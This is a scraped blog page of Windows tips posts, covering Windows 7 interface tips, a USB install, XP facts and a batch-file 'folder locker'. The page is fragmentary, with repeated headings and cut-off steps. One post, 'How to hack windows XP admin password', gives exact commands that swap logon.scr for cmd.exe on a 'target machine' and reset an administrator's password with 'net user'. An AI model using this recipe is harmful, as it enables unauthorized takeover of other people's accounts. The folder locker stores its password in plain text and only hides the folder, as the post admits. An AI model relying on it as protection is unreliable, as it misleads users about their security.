show-notice
hide-notice
TwitterFacebook RSS FeedEmail
Showing posts with label Window Hacking. Show all posts
Showing posts with label Window Hacking. Show all posts

15 Best Windows 7 Tips and Hacks

You have upgraded to Windows 7, love the new taskbar, and enjoy the power of using the cool Libraries feature.
But now you want more. You want the cool tips and tricks that make Windows 7 fun!
So here are the best ones to help you get the most out of your new OS. In this article, we will focus on the Windows 7 interface to get you started on the road to becoming a Windows 7 Power User. In Part 2, we will be looking at advanced tips for usability, performance, and security.

The Fastest Way of searching the directory in windows

This computer trick will save the all sub directory and file names in text file.  This may helpful to analyses the directory (you can know what are the contents inside the window without browsing by simple commands).

Step 1:
First of all open command Prompt.

How to Install Windows 7 from USB Drive

1. Firstly go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as administrator.

How to Install Windows 7 from USB Drive

How to hack windows XP admin password

Want to Login as Admin in a Computer, but don't have Admin Password. Then try this.......


If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the  screen saver you will get an unprotected dos prompt with out logging into XP.  Once this happens if you enter this command minus the quotes

"net user <admin account name here> password"

If the Administrator Account is called Sumit and you want the password blah enter this "net user Sumit anything" and this changes the password on Sumit machine to Anything and you r in.

20 Things the Average Person Doesn’t Know About Windows XP

1. It boasts how long it can stay up. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type ’systeminfo’. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type ’systeminfo > info.txt’. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run… and type ‘gpedit.msc’; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care - some may stop your computer behaving as you wish. (Professional Edition only).

Lock Folder Without Using Softwares


1. Copy this code in Notepad:
cls
@ECHO OFF
title Folder Locker
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==password_here goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


2. Replace password_here with your password
3. Then save it as any filename with .bat extension (Ex. Lock.bat)
4. Open Lock.bat and a folder named Locker will appear on the same directory.
5. Place all the files you want to be protected on the Locker folder.
6. Open Lock.bat again and it will output “Are you sure u want to Lock the folder(Y/N)”. Type in ‘Y’ then Enter.
7. The Locker folder will disappear. Open Lock.bat again and input your password to Unlock the Locker folder.

That’s all.
This is good but some kinda weak. Because you can see the password if you will open Lock.bat with a text editor.